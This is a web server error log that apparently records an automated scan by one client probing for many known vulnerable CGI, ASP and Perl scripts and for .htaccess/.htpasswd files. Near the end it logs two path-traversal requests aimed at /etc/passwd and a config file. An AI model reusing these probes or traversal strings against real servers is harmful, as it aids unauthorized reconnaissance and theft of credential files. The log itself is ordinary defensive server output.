[Wed Sep 29 21:38:45.436864 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:45.561664 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:45.670864 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:45.780064 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:45.904865 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:46.014065 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:46.123265 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum1_professionnel.asp
[Wed Sep 29 21:38:46.232465 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:46.357265 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:46.466465 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:46.575666 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:46.700466 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:46.809666 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:46.918866 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:47.028066 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:47.152867 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:47.262067 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:47.371267 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_arc.asp
[Wed Sep 29 21:38:47.480467 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:47.605267 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:47.714468 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:47.839268 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:47.948468 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:48.057668 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:48.182469 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:48.291669 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:48.400869 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:48.510069 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:48.619269 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:48.744069 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/forum_professionnel.asp
[Wed Sep 29 21:38:48.978070 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/get_od_toc.pl
[Wed Sep 29 21:38:49.212070 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/globals.pl
[Wed Sep 29 21:38:49.321271 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/Gozila.cgi
[Wed Sep 29 21:38:50.007672 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:50.116872 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:50.226072 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:50.335272 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:50.460073 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:50.569273 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:50.694073 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:50.834473 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:50.943673 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:51.068474 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:51.177674 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/imprimer.asp
[Wed Sep 29 21:38:53.970079 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/mailview.cgi
[Wed Sep 29 21:38:54.984080 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:55.108881 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:55.218081 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:55.327281 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:55.436481 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:55.576881 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:55.686082 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:55.810882 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:55.920082 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:56.044882 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:56.154083 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/modif_infos.asp
[Wed Sep 29 21:38:58.416086 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/parse_xml.cgi
[Wed Sep 29 21:39:00.787291 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:00.912091 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:01.052491 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:01.177291 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:01.286492 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:01.395692 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:01.520492 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:01.629692 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:01.770092 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:01.879293 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:01.988493 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:02.113293 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/rubrique.asp
[Wed Sep 29 21:39:02.940094 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/setpasswd.cgi
[Wed Sep 29 21:39:03.876096 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/site_searcher.cgi
[Wed Sep 29 21:39:04.702898 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/sw000.asp
[Wed Sep 29 21:39:06.886901 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/htdocs/userreg.cgi
[Wed Sep 29 21:39:09.226905 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/adduser.cgi
[Wed Sep 29 21:39:09.351706 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/amadmin.pl
[Wed Sep 29 21:39:09.460906 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/anyboard.cgi
[Wed Sep 29 21:39:09.570106 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/AT-generate.cgi
[Wed Sep 29 21:39:09.679306 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/auctiondeluxe
[Wed Sep 29 21:39:09.804106 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/awl
[Wed Sep 29 21:39:09.913307 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/bb-ack.sh
[Wed Sep 29 21:39:10.022507 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/bb-histlog.sh
[Wed Sep 29 21:39:10.147307 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/bb-rep.sh
[Wed Sep 29 21:39:10.256507 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/bb-replog.sh
[Wed Sep 29 21:39:10.365707 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/bbs_forum.cgi
[Wed Sep 29 21:39:10.474908 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/build.cgi
[Wed Sep 29 21:39:10.599708 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/bulk
[Wed Sep 29 21:39:10.708908 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cached_feed.cgi
[Wed Sep 29 21:39:10.818108 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/calender_admin.pl
[Wed Sep 29 21:39:10.927308 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cartmanager.cgi
[Wed Sep 29 21:39:11.052109 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cbmc
[Wed Sep 29 21:39:11.161309 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cgforum.cgi
[Wed Sep 29 21:39:11.286109 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/change-your-password.pl
[Wed Sep 29 21:39:11.395309 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/clickresponder.pl
[Wed Sep 29 21:39:11.504509 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/commandit.cgi
[Wed Sep 29 21:39:11.629310 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/counter-ord
[Wed Sep 29 21:39:11.738510 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/counterbanner
[Wed Sep 29 21:39:11.847710 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/counterbanner-ord
[Wed Sep 29 21:39:11.972510 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/counterfiglet-ord
[Wed Sep 29 21:39:12.081710 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/counterfiglet
[Wed Sep 29 21:39:12.206511 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/CSMailto.cgi
[Wed Sep 29 21:39:12.378111 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/CSMailto
[Wed Sep 29 21:39:12.502911 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/csNews.cgi
[Wed Sep 29 21:39:12.627711 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/csPassword.cgi
[Wed Sep 29 21:39:12.736912 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/csPassword
[Wed Sep 29 21:39:12.846112 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cutecast
[Wed Sep 29 21:39:12.955312 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/day5datanotifier.cgi
[Wed Sep 29 21:39:13.080112 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/db2www
[Wed Sep 29 21:39:13.189312 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/db_manager.cgi
[Wed Sep 29 21:39:13.298513 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/DCFORMS98.CGI
[Wed Sep 29 21:39:13.407713 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/dnewsweb
[Wed Sep 29 21:39:13.516913 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/donothing
[Wed Sep 29 21:39:13.641713 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ezshopper2
[Wed Sep 29 21:39:13.750913 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ezshopper3
[Wed Sep 29 21:39:13.860114 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/if
[Wed Sep 29 21:39:13.969314 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ikonboard
[Wed Sep 29 21:39:14.078514 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/imageFolio.cgi
[Wed Sep 29 21:39:14.203314 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/imagefolio
[Wed Sep 29 21:39:14.312514 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/journal.cgi
[Wed Sep 29 21:39:14.421715 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/magiccard.cgi
[Wed Sep 29 21:39:14.546515 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/majordomo.pl
[Wed Sep 29 21:39:14.655715 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/mojo
[Wed Sep 29 21:39:14.780515 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ncommerce3
[Wed Sep 29 21:39:14.889715 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ncommerce3
[Wed Sep 29 21:39:15.014516 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/non-existent.pl
[Wed Sep 29 21:39:15.123716 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/nph-exploitscanget.cgi
[Wed Sep 29 21:39:15.279716 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/nph-maillist.pl
[Wed Sep 29 21:39:15.388916 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/parse-file
[Wed Sep 29 21:39:15.576117 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/php-cgi
[Wed Sep 29 21:39:15.685317 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/pollssi.cgi
[Wed Sep 29 21:39:15.856917 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/postcards.cgi
[Wed Sep 29 21:39:15.966117 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/profile.cgi
[Wed Sep 29 21:39:16.137718 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/quikstore.cfg
[Wed Sep 29 21:39:16.262518 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/register.cgi
[Wed Sep 29 21:39:16.434118 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/replicator
[Wed Sep 29 21:39:16.543318 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/rightfax
[Wed Sep 29 21:39:16.714919 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/rmp_query
[Wed Sep 29 21:39:16.824119 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/robpoll.cgi
[Wed Sep 29 21:39:17.011319 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/scripts
[Wed Sep 29 21:39:17.120519 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/simplestguest.cgi
[Wed Sep 29 21:39:17.245320 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/simplestmail.cgi
[Wed Sep 29 21:39:17.401320 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/statusconfig.pl
[Wed Sep 29 21:39:17.526120 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/sws
[Wed Sep 29 21:39:17.635320 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/texis
[Wed Sep 29 21:39:17.744520 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/Upload.pl
[Wed Sep 29 21:39:17.947321 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/utm
[Wed Sep 29 21:39:18.072121 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/utm
[Wed Sep 29 21:39:18.477722 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/_vti_bin
[Wed Sep 29 21:39:18.618122 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/_vti_pvt
[Wed Sep 29 21:39:18.742922 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/cfgwiz.exe
[Wed Sep 29 21:39:18.914522 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/Cgitest.exe
[Wed Sep 29 21:39:19.039323 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/mailform.exe
[Wed Sep 29 21:39:19.210923 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ms_proxy_auth_query
[Wed Sep 29 21:39:19.320123 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/post16.exe
[Wed Sep 29 21:39:19.881724 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/cgi-bin/.htaccess
[Wed Sep 29 21:39:20.006524 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/cgi-bin/.htaccess.old
[Wed Sep 29 21:39:20.115725 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/cgi-bin/.htaccess.save
[Wed Sep 29 21:39:20.271725 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/cgi-bin/.htaccess~
[Wed Sep 29 21:39:20.396525 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/cgi-bin/.htpasswd
[Wed Sep 29 21:39:20.505725 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/.passwd
[Wed Sep 29 21:39:20.958126 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/.wwwacl
[Wed Sep 29 21:39:21.067326 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/.www_acl
[Wed Sep 29 21:39:21.238927 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/htdocs/.htpasswd
[Wed Sep 29 21:39:22.206128 2021] [authz_core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH01630: client denied by server configuration: E:/nuevo/htdocs/.htaccess
[Wed Sep 29 21:39:23.797331 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] script not found or unable to stat: E:/nuevo/cgi-bin/ls
[Wed Sep 29 21:39:23.922131 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35070] AH00126: Invalid URI in request GET ////../../data/config/microsrv.cfg HTTP/1.1
[Wed Sep 29 21:39:24.140532 2021] [core:error] [pid 10816:tid 21000] [client 65.94.34.16:35074] AH00126: Invalid URI in request GET ////////../../../../../../etc/passwd HTTP/1.1
[Wed Sep 29 21:39:27.042137 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35076] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi.bat
[Wed Sep 29 21:39:31.113744 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35076] script not found or unable to stat: E:/nuevo/cgi-bin/admin.pl
[Wed Sep 29 21:39:31.238544 2021] [cgi:error] [pid 10816:tid 21000] [client 65.94.34.16:35076] script not found or unable to stat: E:/nuevo/cgi-bin/cfgwiz.exe
